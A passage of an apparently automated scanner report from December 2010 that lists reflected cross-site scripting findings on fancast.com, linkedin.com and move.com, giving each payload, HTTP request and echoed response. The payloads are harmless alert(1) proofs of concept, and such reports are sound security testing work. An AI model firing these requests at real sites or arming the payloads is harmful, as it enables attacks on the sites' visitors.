Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7f0e"><script>alert(1)</script>c253a99a9d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7f0e\"><script>alert(1)</script>c253a99a9d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/?c7f0e"><script>alert(1)</script>c253a99a9d9=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:20:01 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:25:00 GMT
Content-Length: 39728

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Survivor' Hall of Fame Inductee
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/?c7f0e\"><script>alert(1)</script>c253a99a9d9=1"/>
...[SNIP]...

2.494. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db16b</script><script>alert(1)</script>bb947937378 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-newsdb16b</script><script>alert(1)</script>bb947937378/survivor-nicaragua-power-rankings-the-final-round/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:26 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:25 GMT
Content-Length: 40446

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Survivor: Nicaragua' Power Rank
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-newsdb16b</script><script>alert(1)</script>bb947937378/survivor-nicaragua-power-rankings-the-final-round/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style
...[SNIP]...

2.495. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6a0e"><script>alert(1)</script>c57b34cc2a7 was submitted in the REST URL parameter 3. This input was echoed as c6a0e\"><script>alert(1)</script>c57b34cc2a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-newsc6a0e"><script>alert(1)</script>c57b34cc2a7/survivor-nicaragua-power-rankings-the-final-round/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:22 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:21 GMT
Content-Length: 40416

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Survivor: Nicaragua' Power Rank
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-newsc6a0e\"><script>alert(1)</script>c57b34cc2a7/survivor-nicaragua-power-rankings-the-final-round/"/>
...[SNIP]...

2.496. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b521</script><script>alert(1)</script>66ddcc76bc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/?8b521</script><script>alert(1)</script>66ddcc76bc5=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:20 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:20 GMT
Content-Length: 40461

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Survivor: Nicaragua' Power Rank
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/?8b521</script><script>alert(1)</script>66ddcc76bc5=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.497. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61fb5"><script>alert(1)</script>ef00ad01530 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61fb5\"><script>alert(1)</script>ef00ad01530 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/?61fb5"><script>alert(1)</script>ef00ad01530=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:12:14 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:17:14 GMT
Content-Length: 40431

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'Survivor: Nicaragua' Power Rank
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/?61fb5\"><script>alert(1)</script>ef00ad01530=1"/>
...[SNIP]...

2.498. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164a6"><script>alert(1)</script>937cc1681ae was submitted in the REST URL parameter 3. This input was echoed as 164a6\"><script>alert(1)</script>937cc1681ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news164a6"><script>alert(1)</script>937cc1681ae/the-good-wife-gets-social-in-facebook-stunt-episode/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:20:09 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:25:09 GMT
Content-Length: 39334

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'The Good Wife' Gets 'Social' in
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news164a6\"><script>alert(1)</script>937cc1681ae/the-good-wife-gets-social-in-facebook-stunt-episode/"/>
...[SNIP]...

2.499. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf913</script><script>alert(1)</script>94b5713e6aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-newsbf913</script><script>alert(1)</script>94b5713e6aa/the-good-wife-gets-social-in-facebook-stunt-episode/ HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:20:14 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:25:14 GMT
Content-Length: 39364

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'The Good Wife' Gets 'Social' in
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-newsbf913</script><script>alert(1)</script>94b5713e6aa/the-good-wife-gets-social-in-facebook-stunt-episode/&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" sty
...[SNIP]...

2.500. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a07eb</script><script>alert(1)</script>7b0144ebf8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/?a07eb</script><script>alert(1)</script>7b0144ebf8f=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:20:08 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:25:08 GMT
Content-Length: 39379

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'The Good Wife' Gets 'Social' in
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/?a07eb</script><script>alert(1)</script>7b0144ebf8f=1&layout=button_count&show_faces=false&width=120&height=20&action=like&colorscheme=light" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:120px; heig
...[SNIP]...

2.501. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fancast.com
Path:   /blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 620ec"><script>alert(1)</script>3408254d490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 620ec\"><script>alert(1)</script>3408254d490 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/?620ec"><script>alert(1)</script>3408254d490=1 HTTP/1.1
Host: www.fancast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; b=2222222022; cn=n; s_sq=%5B%5BB%5D%5D; s_dfa=comcastctvprod%2Ccomcastglobal; s_lastVisit=11%2F2010;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
X-Pingback: /blogs/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Date: Sun, 19 Dec 2010 18:20:03 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:25:03 GMT
Content-Length: 39349

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
   <head>
       <meta charset="utf-8">
       <title>'The Good Wife' Gets 'Social' in
...[SNIP]...
<meta property="og:url" content="http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/?620ec\"><script>alert(1)</script>3408254d490=1"/>
...[SNIP]...

2.502. https://www.linkedin.com/secure/login [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0f76'-alert(1)-'d08bd5a452d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /secureb0f76'-alert(1)-'d08bd5a452d/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:UgyXg1WuPy0OUWtkWxVSxZHOuDzOudwZpDwXxQtPAvAXtepKZEc3Mj:1292784122:c49f58f2ca243e9673ded51ddc8b5afa43f50a04"; Version=1; Max-Age=1799; Expires=Sun, 19-Dec-2010 19:12:01 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:7623969433150988835"; Version=1; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Set-Cookie: bcookie="v=1&f0fc9de9-9802-4f8e-9c5e-af6a6a3dec82"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 06-Jan-2079 21:56:09 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 990
Date: Sun, 19 Dec 2010 18:42:01 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a421968;expires=Sun, 19-Dec-2010 19:11:45 GMT;path=/;httponly

<!DOCTYPE html>
<html>
<head title="Redirecting...">
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta name="pagekey" content="external_redirect" />
<style type="
...[SNIP]...
<script type="text/javascript">window.location.replace('http://www.linkedin.com/secureb0f76'-alert(1)-'d08bd5a452d/login');</script>
...[SNIP]...

2.503. http://www.move.com/trends/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.move.com
Path:   /trends/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4aa3</script><script>alert(1)</script>bba5a26af0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trends/?a4aa3</script><script>alert(1)</script>bba5a26af0a=1 HTTP/1.1
Host: www.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:10:41 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.move.com/trends/xmlrpc.php
Keep-Alive: timeout=2, max=196
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 67782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" language="JavaScript">
s.pageName="Trends: trends/?a4aa3</script><script>alert(1)</script>bba5a26af0a=1";
s.channel="Trends";

if(s.pageName){ s.prop21="M: " + s.pageName; }
if(s.channel){ s.prop22="M: " + s.channel; }

s.prop27="trends.move.com";
s.prop26= 'Not Registered';
var s_code=s.t();
if(s_co
...[SNIP]...

2.504. http://www.move.com/trends/celebrity-real-estate-highlights-36/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.move.com
Path:   /trends/celebrity-real-estate-highlights-36/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2224f</script><script>alert(1)</script>9ab7277185f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trends/celebrity-real-estate-highlights-362224f</script><script>alert(1)</script>9ab7277185f/ HTTP/1.1
Host: www.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:10:36 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.move.com/trends/xmlrpc.php
Keep-Alive: timeout=2, max=167
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 67847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" language="JavaScript">
s.pageName="Trends: trends/celebrity-real-estate-highlights-362224f</script><script>alert(1)</script>9ab7277185f";
s.channel="Trends";

if(s.pageName){ s.prop21="M: " + s.pageName; }
if(s.channel){ s.prop22="M: " + s.channel; }

s.prop27="trends.move.com";
s.prop26= 'Not Registered';
var s_code=s.t();
if(s_code
...[SNIP]...

2.505. http://www.move.com/trends/celebrity-real-estate-highlights-36/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.move.com
Path:   /trends/celebrity-real-estate-highlights-36/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e836</script><script>alert(1)</script>d3eadce974c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trends/celebrity-real-estate-highlights-36/?6e836</script><script>alert(1)</script>d3eadce974c=1 HTTP/1.1
Host: www.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:10:16 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.move.com/trends/xmlrpc.php
Keep-Alive: timeout=2, max=191
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 41302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" language="JavaScript">
s.pageName="Trends: trends/celebrity-real-estate-highlights-36/?6e836</script><script>alert(1)</script>d3eadce974c=1";
s.channel="Trends";

if(s.pageName){ s.prop21="M: " + s.pageName; }
if(s.channel){ s.prop22="M: " + s.channel; }

s.prop27="trends.move.com";
s.prop26= 'Not Registered';
var s_code=s.t();
if(s_co
...[SNIP]...

2.506. http://www.move.com/trends/charity-gifts-for-christmas/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.move.com
Path:   /trends/charity-gifts-for-christmas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b28ce</script><script>alert(1)</script>6cdcf29f70b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trends/charity-gifts-for-christmasb28ce</script><script>alert(1)</script>6cdcf29f70b/ HTTP/1.1
Host: www.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:10:39 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.move.com/trends/xmlrpc.php
Keep-Alive: timeout=2, max=175
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 67831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" language="JavaScript">
s.pageName="Trends: trends/charity-gifts-for-christmasb28ce</script><script>alert(1)</script>6cdcf29f70b";
s.channel="Trends";

if(s.pageName){ s.prop21="M: " + s.pageName; }
if(s.channel){ s.prop22="M: " + s.channel; }

s.prop27="trends.move.com";
s.prop26= 'Not Registered';
var s_code=s.t();
if(s_code
...[SNIP]...

2.507. http://www.move.com/trends/charity-gifts-for-christmas/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.move.com
Path:   /trends/charity-gifts-for-christmas/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c082d</script><script>alert(1)</script>23f54655df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trends/charity-gifts-for-christmas/?c082d</script><script>alert(1)</script>23f54655df=1 HTTP/1.1
Host: www.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:10:18 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.move.com/trends/xmlrpc.php
Keep-Alive: timeout=2, max=178
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 39690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" language="JavaScript">
s.pageName="Trends: trends/charity-gifts-for-christmas/?c082d</script><script>alert(1)</script>23f54655df=1";
s.channel="Trends";

if(s.pageName){ s.prop21="M: " + s.pageName; }
if(s.channel){ s.prop22="M: " + s.channel; }

